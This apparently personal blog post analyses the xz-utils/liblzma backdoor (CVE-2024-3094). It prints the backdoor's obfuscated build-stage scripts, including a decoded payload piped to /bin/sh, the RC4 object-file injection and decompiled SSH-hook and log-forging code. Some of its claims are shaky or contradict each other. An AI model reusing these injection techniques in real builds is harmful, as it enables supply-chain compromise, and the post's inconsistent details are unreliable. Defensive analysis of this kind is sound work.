Dissecting the xz-utils Backdoor

An attempt at making sense of the xz/liblzma backdoor (CVE-2024-3094), or 2024's hardest CTF challenge

·

26 min read

Dissecting the xz-utils Backdoor

Cover Illustration by cloudnienty

On March 29th, 2024, a critical backdoor (CVE-2024-3094) was discovered in the widely-used xz/liblzma package, a program for interacting with lzma-based compressed files. The backdoor was discovered by a Microsoft engineer who saw that his program was executing 500 ms slower (which is pretty rad ngl, 10x engineer type shit).

While many publically have called this an OpenSSH authentication bypass, this is actually a more complex remote code execution attack with the payload being seperated into four different stages, all of them are significantly obfuscated.

This post might contain innacurate or incomplete analysis, as this is a currently developing situation with many in the industry trying to make sense of this entire mess. This article also uses some research tidbits and references from the following articles :

Pre-Exploit Activity

The GitHub user responsible, who is using the alias Jia Tan, seemed to have worked tirelessly to obscure his activity through reverse engineering his way into backdooring the repo for more than two years. But while his [TBA]

Disabling of Linux Landlock

It seems like the threat actor disabled a piece of code in the .xz repository by adding subtle changes in a script used to check for landlock support, which is a security module that allows applying strict rules to limit the system calls and filesystem access of user processes, enhancing security through sandboxing.

In the diff, the following changes are made:

  1. Adding a dot (.) at the end of the my_sandbox function definition (line 8), which introduces a syntax error in the C code and will prevent it from compiling successfully

  2. Changing the letter 'C' in "LINUX_LANDLOCK" to a Cyrillic 'C' (line 25 and line 27), which creates a subtle difference in the string that can bypass string comparison checks

The landlock bypass affects the xz component, and not the liblzma component. So its possible that this was made in preperation for a seperate payload that was still under construction.

Initial Backdoor Component in Upstream Branch

We can see in the .git commit history that the initial component of the backdoor compilation process build-to-host.m4 is excluded through gitignore in the main branch.

Instead we can see the file instead in the upstream version in the debian/unstable branch.

While GitHub automatically generates a tarball from the git tag, maintainers also have the option to upload additional files alongside the automatic ones.This functionality is a double-edged sword.

On one hand, it allows maintainers to include necessary generated files that are not part of the git repository, such as configuration scripts. On the other hand, it opens the door to potential misuse if someone with access adds files that are not part of the official source.

Automatically generated archives might not be sufficient for complex projects and one of the solutions might be the use of git tag checkout. However, such changes would complicate the build and packaging processes, particularly for distributions like Debian, which often use patches and require additional files that aren't part of the upstream source.


Obfuscation Routine

Stage 1 : build-to-host.m4

The exploit starts with this build-to-host file, which is an Autoconf macro file used to handle file name translations between the build environment and the target runtime environment. This is necessary when the build environment (e.g., the system where the software is being compiled) is different from the target runtime environment (e.g., the system where the compiled software will be executed).

The code has a very interesting tidbit, especially in the somedir_c_make function on Line 63

dnl Define somedir_c_make.
[$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
dnl Use the substituted somedir variable, when possible, so that the user
dnl may adjust somedir a posteriori when there are no special characters.
 if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
   [$1]_c_make='\"$([$1])\"'
 fi
 if test "x$gl_am_configmake" != "x"; then
   gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
 else
   gl_[$1]_config=''
 fi
 _LT_TAGDECL([], [gl_path_map], [2])dnl
 _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
 _LT_TAGDECL([], [gl_am_configmake], [2])dnl
 _LT_TAGDECL([], [[$1]_c_make], [2])dnl
 _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
 AC_SUBST([$1_c_make])

The gl_[$1]_config variable is defined with a command that performs data extraction and obfuscation removal on a file specified by $gl_am_configmake. It reads the file's contents using sed, appends a newline character, and pipes the output to eval with the $gl_path_map variable, which contains a tr command that performs character substitutions (likely to "uncorrupt" obfuscated data). The resulting output is then piped to a command specified by $gl_[$1]_prefix with the -d option, presumably for decompression or decoding. Any errors from this final command are suppressed by redirecting them to /dev/null. This process is designed to extract and execute a hidden, obfuscated script from the tests/files/bad-3-corrupt_lzma2.xz file during the build process.

gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
gl_path_map='tr "\t \-_" " \t_\-"'

Next part of the exploit is contained in Line 95 of the code, which acts as the translation function to un-obfuscate the bad-3-corrupt_lzma2.xz payload.


Stage 2 : bad-3-corrupt_lzma2.xz

After the deobfuscating routine is completed, we get the following bash file. This seems to be another deobfuscation routine.

# retrieve the 'srcdir' path from config.status or a parent's config.status
if test -f config.status; then
    eval $(grep ^srcdir= config.status)
elif test -f ../../config.status; then
    eval $(grep ^srcdir= ../../config.status)
    srcdir="../../$srcdir"
fi

# export a command sequence to variable 'i' for later evaluation
export i="(\
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +724 \
)"

# process a compressed file, apply transformations, decompress, and execute as shell commands
(
    xz -dc "$srcdir/tests/files/good-large_compressed.lzma" | \
    eval $i | \
    tail -c +31265 | \
    tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" \
) | xz -F raw --lzma1 -dc | /bin/sh

The script begins by evaluating the contents of the config.status file to extract the value of the srcdir variable, which likely represents the project's source directory. This step is essential for locating the required files and directories during the deobfuscation process.

eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi

The next step is to define a function i that performs selective byte extraction from a data stream. This function is a long chain of head commands that alternately skip and output bytes from the input.

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && ... && head -c +724)"

The function starts by skipping the first 1024 bytes (head -c +1024 >/dev/null), followed by outputting the next 2048 bytes (head -c +2048). This pattern repeats, alternating between skipping 1024 bytes and outputting 2048 bytes. The final head command outputs either 724 or 939 bytes, depending on the script version.

The code then proceeds to its main deobfuscation process is encapsulated in the following command

Finally, the decompressed and deobfuscated data is piped to the system's shell (/bin/sh) and executed.

(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh

The script decompresses the tests/files/good-large_compressed.lzma file using the xz -dc command. The decompressed output is then piped to the eval $i command, which applies the previously defined i function. This step selectively extracts specific byte ranges from the decompressed data stream. The output from the previous step is put to tail -c +31265, which skips the first 31,264 bytes (or 31,232 bytes, depending on the version).

The remaining data is then passed through a tr command, which performs a character substitution or decryption using a specific key ("\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377"). The output from the previous step is then decompressed again using the LZMA1 compression algorithm in xz -F raw --lzma1 -dc.

The resulting file is the next piece of the code, which is one of the more beefier sections of the exploit outside of the main payload.


Stage 3 : good-large_compressed.lzma

The final bash script from good-large_compressed.lzma is significantly more complex than the previous scripts, but in the end its just another layer of deobfuscation with additional checks.

The script starts by performing a series of checks to ensure that the environment meets specific conditions.

if test -f config.status; then
    eval $zrKcSS
    eval `grep ^LD=\'\/ config.status`
    eval `grep ^CC=\' config.status`
    eval `grep ^GCC=\' config.status`
    eval `grep ^srcdir=\' config.status`
    eval `grep ^build=\'x86_64 config.status`
    eval `grep ^enable_shared=\'yes\' config.status`
    eval `grep ^enable_static=\' config.status`
    eval `grep ^gl_path_map=\' config.status`
    eval $zrKccj
    # ... (more checks follow)
fi

The code first checks for the existence of the config.status file, and then reads the specific values of various variables (e.g., LD, CC, GCC, srcdir, build, enable_shared, enable_static, gl_path_map) from the config.status file.

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"; then
    eval $zrKcst
    # ... (more checks follow)
fi

The code then checks if either the debian/rules file exists in the source directory ($srcdir) or if the RPM_ARCH variable is set to x86_64. This means that the target system must be x86-64, and the compilation process must be part of a Debian or RPM package build.

if (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then
    eval $zrKcKQ
    # ... (more checks follow)
fi

If the conditions are met and the script is running in the context of a Debian or RPM package build, it modifies the src/liblzma/Makefile file.

b="am__test = $U"  # U is the 'bad-3-corrupt_lzma2.xz' file
sed -i "/$j/i$b" src/liblzma/Makefile || true

# inject additional rules and variables
h="-Wl,--sort-section=name,-X"
if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
    h=$h",-z,now"
fi
j="liblzma_la_LDFLAGS += $h"
sed -i "/$L/i$j" src/liblzma/Makefile || true

These modifications include:

  • Adding a reference to a corrupted test file (bad-3-corrupt_lzma2.xz) as a dependency

  • Injecting additional build rules and variables related to linker flags, object file dependencies, and environment variable exports

  • Modifying the linker flags to include options like -z,now (disabling lazy binding) and -Wl,--sort-section=name,-X (sorting sections by name and applying linker script).

The script also modifies the libtool script by replacing a specific pattern (^pic_flag=\" -fPIC -DPIC\"$) with a custom compilation flag (-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections).

sed -i "s/$O/$C/g" libtool || true
# O="^pic_flag=\" -fPIC -DPIC\"$"
# C="pic_flag=\" $P\"" (where P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections")

If the script detects the presence of specific object files (liblzma_la-crc64_fast.o and liblzma_la-crc32_fast.o), it performs additional checks and then generates new versions of these object files. This process involves retrieving a compressed payload from the good-large_compressed.lzma file and then decompressing and decoding the payload using a modified version of RC4.

# Decompress the input file using xz
xz -dc $top_srcdir/tests/files/$p |

# Evaluate the decoded file
eval $i |

# Convert each character to a separate line
LC_ALL=C sed "s/\(.\)/\1\n/g" |

# Implement a modified RC4 algorithm
LC_ALL=C awk
BEGIN {
    # Set the field separator to newline and record separator to newline
    FS="\n"; RS="\n"; ORS=""

    # Initialize variables
    m = 256 # Modulus value
    for (i = 0; i < m; i++) {
        t[sprintf("x%c", i)] = i # Create a lookup table for characters
        c[i] = ((i * 7) + 5) % m # Initialize the state array
    }
    i = 0; j = 0

    # "Drop" RC4, discarding 4096 bytes of keystream
    for (l = 0; l < 4096; l++) {
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        c[i] = c[j]
        c[j] = a
    }
}

# Decoding loop
{
    # Lookup the character value
    v = t["x" (NF < 1 ? RS : $1)]

    # Generate keystream bytes
    i = (i + 1) % m
    a = c[i]
    j = (j + a) % m
    b = c[j]
    c[i] = b
    c[j] = a
    k = c[(a + b) % m]

    # Apply the keystream with addition modulo 256
    printf "%c", (v + k) % m
} |

# Decompress the output again using xz
xz -dc --single-stream |

# Truncate the output to the desired length
((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true

The script starts by decompressing an input file using the xz utility with the -dc option, which decompresses the input from standard input and writes the decompressed data to standard output. The decompressed data is then evaluated using eval $i, where $i is likely a variable containing the decoded data.

The output of the eval command is piped to sed, which replaces each character with a newline character using the s/\(.\)/\1\n/g command. This step is necessary to prepare the data for the next stage, which is implemented using awk. The awk script implements a modified RC4 algorithm to decode the obfuscated data.

The BEGIN block initializes variables and prepares the RC4 state array. It creates a lookup table t to map characters to their corresponding byte values, and initializes the state array c with a linear congruential generator.

The for loop inside the BEGIN block "drops" the first 4096 bytes of the RC4 keystream by performing 4096 iterations of the RC4 key setup.

The main decoding loop looks up the byte value of the current character using the t lookup table and generates two keystream bytes using the RC4 algorithm and then applies the keystream to the current character using addition modulo 256 instead of the usual XOR operation and the decoded character is printed to standard output.

The decoded output from the awk script is then piped back to xz with the -dc --single-stream options, which decompresses the data again. And then finally the script uses the head command to truncate the output to a specific length, determined by the values of $N and $W. The truncated output is redirected to the file liblzma_la-crc64-fast.o.

xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk '...' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
# decompresses and decodes the payload from 'good-large_compressed.lzma'

sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \
sed "/include \"crc_x86_clmul.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c -  $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null
# prepends a header, appends custom code, and compiles the modified crc64_fast.c

The $V variable contains the malicious code injection, specifically the script replaces the original is_arch_extension_supported() function in the crc64_fast.c and crc32_fast.c files with this malicious _is_arch_extension_supported() function

The is_arch_extension_supported() function is supposed to check if the CPU supports certain architecture extensions needed for optimized CRC computation. The xz-utils library contains optimized CRC implementations that take advantage of CPU-specific instructions like the CLMUL instruction set on x86 CPUs. The is_arch_extension_supported() function is used to dynamically determine if the optimized CRC implementations can be used or if the generic (non-optimized) implementations should be used instead.

if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then
    if test ! -f .libs/liblzma.so; then
        mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
        mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
    fi
    rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true
else
    mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
    mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi

After modifying crc64_fast.c source file, it then compiles it using the previously generated liblzma_la-crc64-fast.o file as input. The resulting object file (liblzma_la-crc64-fast.o) is then used to rebuild the liblzma library, which is the next level of the malware.


The Backdoor : liblzma_la-crc64-fast.o

A .o binary is an object file that contains metadata generated by a compiler during compilation, and its not usually directly executable. These files need to be linked together to create an executable binary or a shared library.

The previous good-large_compressed.lzma script is modifies liblzma_la-crc64-fast.o and then links it into a shared library (liblzma.so) using the linker command

$AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD

The Payload

The malicious code they contain gets incorporated into the final shared library liblzma. While SSH itself doesn't use liblzma, many linux distributions bundle SSH's systemd component, which depends on liblzma.

As explained earlier, during the rebuilding of liblzma, the added bits in the crc64_fast.c source file that compiled to liblzma_la-crc64-fast.o, specifically the modified _is_arch_extension_supported() function which calls the external _get_cpuid() function. This function is not part of the xz-utils codebase; instead, it is provided by a malicious object file that the script injects into the build process.

Below the original is_arch_extension_supported() function from the crc_x86_clmul.h header file.

static inline bool
is_arch_extension_supported(void)
{
    uint32_t eax, ebx, ecx, edx;

    /* Check if CPU supports CLMUL instruction set */
    __get_cpuid(1, &eax, &ebx, &ecx, &edx);
    return (ecx & (1 << 1)) && (ecx & (1 << 9));
}

The malicious script replaces this function with a custom _is_arch_extension_supported() function that calls the injected _get_cpuid() function instead:

extern int _get_cpuid(int, void*, void*, void*, void*, void*);

static inline bool _is_arch_extension_supported(void) {
    int success = 1; 
    uint32_t r[4];
    success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);
    const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
    return success && (r[2] & ecx_mask) == ecx_mask;
}

Compared to the original function, it calls the malicious _get_cpuid() function instead of using the built-in __get_cpuid() instruction. It checks for an additional CPU feature flag (bit 19 of the ecx register) along with the CLMUL flags, but as the _get_cpuid() is provided by the malicious binary, it acts as the hook into backdooring sshd.

is_arch_extension_supported calls __get_cpuid (provided by GCC), but the backdoored build script modifies crc64_fast.c so it calls _get_cpuid instead, which is responsible for carrying out the primary malicious actions of the backdoor. One of the key malicious actions performed by _get_cpuid() is the modification of the Global Offset Table (GOT) and Procedure Linkage Table (PLT) for the executable being built.

The _get_cpuid() function is executed during the build process, allowing it to perform modify the GOT and PLT to hijack the RSA_public_decrypt() function. This is achieved by exploiting the GNU indirect function (ifunc) mechanism, which allows for dynamic resolution of function implementations at runtime based on certain conditions, such as CPU capabilities.

The reason the backdoor hijacks the ifunc resolver is because ifunc resolvers are executed very early during program startup, before the GOT and PLT are marked read-only for security reasons. By intercepting the ifunc resolver and injecting the malicious _get_cpuid() function, the backdoor can modify the GOT and PLT while they are still writable, allowing the hijacking of RSA_public_decrypt().

__int64 __fastcall sub_A710(unsigned int a1, __int64 a2
{
    __int64 v4; // r9
    unsigned int v6; // [rsp+14h] [rbp-4Ch] BYREF
    char v7[4]; // [rsp+18h] [rbp-48h] BYREF
    char v8[4]; // [rsp+1Ch] [rbp-44h] BYREF
    __int64 v9[8]; // [rsp+20h] [rbp-40h] BYREF

    v4 = 0LL;
    if ( dword_CF48 == 1 )
    {
        v9[0] = 1LL;
        memset(&v9[1], 0, 32);
        v9[5] = a2;
        Llzma_block_param_encoder_0(v9, a2, a3, a4, v9, 0LL);
        v4 = a2;
    }
    ++dword_CF48;
    cpuid(a1, &v6, v7, v8, v9, v4);
    return v6;
}

The Llzma_index_prealloc_0() function is where the hijacking of the RSA_public_decrypt() function's GOT (Global Offset Table) entry takes place. The code first checks if the Llzma12_coder_1 variable is not null, and then proceeds to retrieve the address of the original RSA_public_decrypt() function.

__int64 __fastcall Llzma_index_prealloc_0(unsigned int a1, __int64 a2, __int64 a3,  __int64 a4, __int32 a5)
{
    __int64 (__fastcall **v4)(_QWORD, __int64, __int64, __int64); // rax
    __int64 (__fastcall *v5)(_QWORD, __int64, __int64, __int64); // r14
    __int64 result; // rax
    _int64 v8; // [rsp+Oh] [rbp-48h]
    int v9[11]; // [rsp+1Ch] [rbp-2Ch] BYREF

    if ( !Llzma12_coder_1 )
        return 0LL;
    v4 = *(__int64 (__fastcall ***)(_QWORD, __int64, __int64, __int64))(Llzma12_coder_1 + 8);
    if ( !v4 )
        return 0LL;
    v5 = *v4;
    if ( !*v4 )
        return 0LL;
    if ( !a4 )
        return v5(a1, a2, a3, a4);
    v8 = a4;
    v9[0] = 1;
    result = Llzma_index_stream_size_1(a4, Llzma12_coder_1, v9);
    a4 = v8;
    if ( v9[0] )
        return v5(a1, a2, a3, a4);
    return result;
    }

The code will verify the remote server's host key with a specific Ed448 key, when this authentication is successful it executes its code through the system() function. Otherwise, it will just continue on to the original version. As the hook is to the RSA_public_decrypt function, a function originally used for validating RSA signatures, the code can tamper with SSH's authentication mechanism. The hook code examines the RSA public modulus, and this modulus is completely controlled by the attackers who are connecting to the SSH client.

When logging into the impacted machine using the attacker's SSH certificate, the attack payload is extracted from the public key, then further verified, and finally decrypted using the ChaCha20 symmetric stream cipher, and the decrypted data is executed as a command.

0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48

The decrypted data contains 114 bytes of signature which is matched with the following Ed448 public key :

0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
10 0c b0 6c 3a be 14 ee 89 55 d2 45 00 c7 7f 6e
20 d3 2c 60 2b 2c 6d 31 00

The decrypted payload string is then executed as a shell command by passing it directly to system() (through a fake allocator mechanism that will be discussed on the next section) only if the signatures are confirmed as valid, otherwise the code passes execution back to to the original function.

__int64 __fastcall Llzma_delta_decoder_init_part_0(_QWORD *a1)
{
    __int64 result; // rax
    result = 5LL;
    if ( a1 )
    {
        a1[7] = &Lfilter_options_0;
        result = 0LL;
        if ( !a1[6] )
        {
            a1[13] = 4LL;
            a1[8] = sub_28C0;
            a1[9] = Llzma_index_prealloc_0;
            a1[10] = Llzma12_mode_map_part_1;
            a1[11] = Lfile_info_decode_0;
            a1[14] = Lbt_skip_func_part_0;
            a1[15] = 101LL;
        }
    }
    return result;
}

The public key is known, but only the attackers have the corresponding Ed448 private signing key, which means the backdoor can only be used by the attackers and the signature is bound to the host’s public key, meaning that a valid signatures can't be reused on different hosts.


Stealthy Anti-Forensic Tricks

The code tries very hard (harder than most malware) to remain hidden. If the level of the sophistication in the obufuscating and the backdoor delivery section of the malware haven't convinced you that this isn't a state-backed actor, than the lengths it goes to hide its activities might.

The liblzma library provides a memory allocation layer that forwards allocation and deallocation requests to dedicated allocator objects. When calling lzma_alloc or lzma_free, the library essentially invokes the corresponding function pointers within the provided allocator object.

The malware implements a fake allocator by abusing the lzma_alloc function from the liblzma library. Instead of performing memory allocation, this fake allocator is designed to look up symbol addresses based on string IDs. When lzma_alloc is called with a string ID as the size argument, the fake allocator interprets it as a request to resolve the corresponding symbol. The string IDs used by the malware are divisible by 8 and fall within the range of 10 to 0xd10, making them appear like plausible size values at first glance.

The fake allocator object is returned by a function named .Lstream_decoder_memconfig.part.1. This allocator structure contains a context pointer, which is passed to the allocation and deallocation functions. In the case of the fake allocator, the opaque member of the allocator structure is used to store a pointer to internal ELF module descriptor records, providing additional context for symbol resolution.

The usage pattern of the fake allocator can be summarized as follows: First, the GetFakeAllocator function is called to obtain a pointer to the fake allocator object. Next, the opaque member of the allocator is set to point to the ELF module descriptor for the desired library (e.g., libc). Then, lzma_alloc is called with a string ID representing the symbol to be resolved (e.g., 0xAB8 for setresuid). The returned pointer represents the resolved symbol address, which can be used or stored by the malware as needed.

This allocator is used to resolve and call system(), effectively hiding these calls from static analysis. The lzma_alloc function is typically used for memory allocation purposes within the liblzma library. However, the malware hijacks this function and repurposes it as an import resolution mechanism. The malware achieves this by implementing a custom lzma_allocator structure and providing it to the lzma_alloc function.

The lzma_allocator structure has three fields: alloc, free, and opaque. The malware sets the alloc field to point to the Linit_pric_table_part_1 function, and the free field to Lstream_decode_1. However, the true purpose of these functions is not memory allocation/deallocation; instead, they serve as wrappers for resolving and calling imported functions.

system_func = lzma_alloc(STR_system_, lzma_allocator);
ctx->system = system_func;
if (system_func)
    ++ctx->num_imports;

In this code snippet, STR_system_ is likely a string representation of the "system" function name. The lzma_alloc function treats this as a request to resolve the system() import and returns the corresponding function address, which is then stored in system_func.

ulong _Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, undefined *elf_info, ctx *ctx)
{
    long lzma_allocator;
    ulong uVar1;
    void *fn_read;
    void *fn___errno_location;

    // Get the address of the custom lzma_allocator
    lzma_allocator = get_lzma_allocator(1);

    // Parse the ELF file and store information in elf_info
    uVar1 = parse_elf(*p_elf, elf_info);

    // If the ELF parsing was successful
    if ((int)uVar1 != 0) {
        // Store the parsed elf_info in the opaque field of lzma_allocator
        *(undefined **)(lzma_allocator + 0x10) = elf_info;

        // Resolve the "read" import using lzma_alloc
        fn_read = (void *)lzma_alloc(0x308, lzma_allocator);
        ctx->fn_read = fn_read;
        if (fn_read != (void *)0x0) {
            ctx->num_imports++;
        }

        // Resolve the "__errno_location" import using lzma_alloc
        fn___errno_location = (void *)lzma_alloc(0x878, lzma_allocator);
        ctx->__errno_location = fn___errno_location;
        if (fn___errno_location != (void *)0x0) {
            ctx->num_imports++;
        }

        // Set uVar1 to 1 if both imports were resolved successfully
        uVar1 = (ulong)(ctx->num_imports == 2);
    }

    return uVar1;
}

The third field of the lzma_allocator structure, accessed via the offset 0x10 (lzma_allocator + 0x10), is abused to pass information about the loaded ELF file to the "fake allocator" function. This field, which can be considered as the opaque field, is set to the elf_info pointer (*(undefined **)(lzma_allocator + 0x10) = elf_info;), which contains information about the parsed ELF file. This information can then be used by the "fake allocator" functions, such as Linit_pric_table_part_1 (acting as the alloc function) and Lstream_decode_1 (acting as the free function), to perform additional operations based on the loaded ELF file.

This allows the malware to hide critical function calls from static analysis tools, as these calls are not directly visible in the binary's code. Additionally, by abusing the lzma_alloc function, the malware can dynamically resolve and call imported functions without relying on traditional import resolution mechanisms, making it harder to detect and analyze the malware's behavior.

The binary also checks if a software breakpoint has been inserted by a debugger. It checks if the instruction at the given code_addr is the endbr64 instruction (0xfa1e0ff3) , which is typically present when a debugger inserts a software breakpoint.

// Check if the instruction endbr64 is overwritten (software breakpoint detection)
bool breakpointcheck(int *param_1,long param_2,uint param_3)
{
  bool bVar1;
  bVar1 = false;
  if (3 < param_2 - (long)param_1) {
    bVar1 = (param_3 | 0x5e20000) + *param_1 == 0xf223;// 5E2E230
  }
  return bVar1;
}

The condition checks if the difference between param_2 and (long)param_1 is greater than 3, which ensures that there is enough space to read the endbr64 instruction which is 4 bytes. If the condition is true, the function returns the result of the expression (param_3 | 0x5e20000) + *param_1 == 0xf223. This expression checks if the value at (long)param_1 (dereferenced) is equal to 0xfa1e0ff3 (the endbr64 instruction) by performing bitwise operations on a3 and comparing the result with 0xF223.

As the attacker uses this remote code execution exploit to bypass SSH's regular authentication methods, one might assume that this activity is easily fingerprinted in the SSH connection logs. But the code appears to have7 a mechanism to construct fake log entries to replace a successful connection message in an SSH server's log.

ConnectionClosedBy = ssh_consts->ConnectionClosedBy;
for (i = 0LL; i != 21; log_line[i - 1] = v26) // "Connection closed by "
   v26 = *(ConnectionClosedBy + i++);
authenticating = ssh_consts->authenticating; // "authenticating"
for (j = 0LL; j != 14; ++j)
   log_line[j + 21] = *(authenticating + j);
log_line[35] = ' ';
user_string = ssh_consts->user_string; // "user"
for (k = 0LL; k != 4; ++k)
   log_line[k + 36] = *(user_string + k);
log_line[40] = ' ';
v31 = ssh_consts->string_percent_s_key; // "%s"
log_line[41] = *v31;
LOBYTE(v31) = v31[1];
log_line[43] = ' ';
log_line[42] = v31;
v32 = ssh_consts->string_percent_s_key; // %s
log_line[44] = *v32;
LOBYTE(v32) = v32[1];
*&log_line[46] = '['; // "["
log_line[45] = v32;
string_preauth = ssh_consts->string_preauth; // "preauth"
for (m = 0LL; m != 7; ++m)
{
   LOBYTE(ConnectionClosedBy) = *(string_preauth + m);
   log_line[m + 48] = ConnectionClosedBy;
}
log_line[55] = ']'; // "]"
v19 = LODWORD(ssh_consts->field_8) == 0;
ssh_consts->started_ssh_log_hiding = 1;
if (!v19)
{
   if (runtime_functions)
   {
       v35 = runtime_functions->setlogmask;
       if (v35)
           v35(0xFFLL, string_preauth, &log_line[48], ConnectionClosedBy, v22, right_after_accept_string_1);
   }
}
result = MEMORY[0x7FEAAF6399B15]( // calls sshlogv
   ssh_consts,
   3LL,
   log_line,
   &username,
   &ip_address,
   right_after_accept_string);

The function starts by initializing several variables with values from the ssh_consts structure, which contains constants and strings used in the SSH server's logging mechanism. It then constructs a log entry string in the log_line buffer. The string starts with the text "Connection closed by" followed by the "authenticating" and "user" strings.

It adds placeholders for variables ("%s") and encloses the "preauth" string in square brackets. It sets a flag started_ssh_log_hiding to 1, indicating that the log hiding functionality is being used and if a runtime_functions structure is available, it calls the setlogmask function with the "preauth" string and parts of the constructed log entry as arguments.

Connection from 172.17.0.1 port 46722 on 172.17.0.2 port 22 rdomain ""
Connection closed by authenticating user root 172.17.0.1 port 46722 [preauth]

The backdoor effectively replaces log entries describing successful connections with the backdoor with entries describing failed connection attempts. So while you might see a spike in failed SSH connections in your logs, you might not be able to determine effectively if you're impacted by this backdoor or not.


Q&A and Conclusions

Q : Is this a major problem? Should i burn every piece of linux-based technology i have? Should i wake up my sysadmins at 12 am to fix this?

A : As mentioned previously, the backdoor only compiles under x86-based systems running Debian, and a bleeding edge or unstable version of Debian at that which you SHOULD NEVER RUN IN A PRODUCTION ENVIRONMENT EVER.

Q : But can an attacker repurpose this attack? Maybe by patching the authentication mechanism?

A : This still means that they need to attack an x86 machine running a Debian distribution. The RCE does not compile in non-x86 machines (so M-series Macs are excluded) and it will also not compile if its not part of an RPM package build. Even if someone was able to modify the compiled exploit, this will still be too impractical to repurpose and exploit.


Q : Isn't the open source development supposed to stop this type of attack? Why didn't it get caught sooner?

A : It's clear from the communications between the owner of xz-utils Lasse Collin and a couple other suspicious Github accounts, that he was pressured to make changes and cede control to Jia Tan, plus he was gaslit and bullied repeatedly. Add to the fact that working in an open source package decompresser utility isn't as sexy as pushing PRs to frida or the linux kernel, it made sense why this happened.

The attack was caught because someone was able to audit the code independently, without having to manually reverse engineer the full source code or anything. Something you can't do as easily in a proprietary piece of software.


Q : Why wasn't this caught by systems like EDRs, AVs, or Runtime Dependency Monitoring tools like Amazon Inspector?

A : Coverage of EDRs in Linux environments are not that good, so its not entirely stupid to suggest that no amount of security mumbo-jumbo was able to catch this through heuristics. But many are forgetting the fact that this is deployed in unstable branches of many distros, which are not for production workloads and thus would probably not have security tools in place. It would be a different story if they got this into Ubuntu Server or RHEL.

For what its worth, Crowdstrike did say that they were able to detect the initial compilation of the binary through the usage of the tr command.


Are there probably more sleeper RCEs in popular linux dependencies? I dont know. I do hope that this incident will inspire alot of us to take a deeper look at many of the dependencies we blindly trust today.

Who did it? Nobody knows exactly, but some fingers are already being pointed at several old players. The actor has gone to great lenghts in making it seem like he works in China, from the UTC +8 commit times correlating to office hours in the Mainland and using a Singaporean VPN node. But this seems abit too easy to spot and is likely a misdirection strategy. For what its worth, i do believe its a state-sponsored attack and not some single-guy basement dweller, i just don't have the confidence (or experience) to say who exactly.

Did this take a lot more time than i had expected? Yes.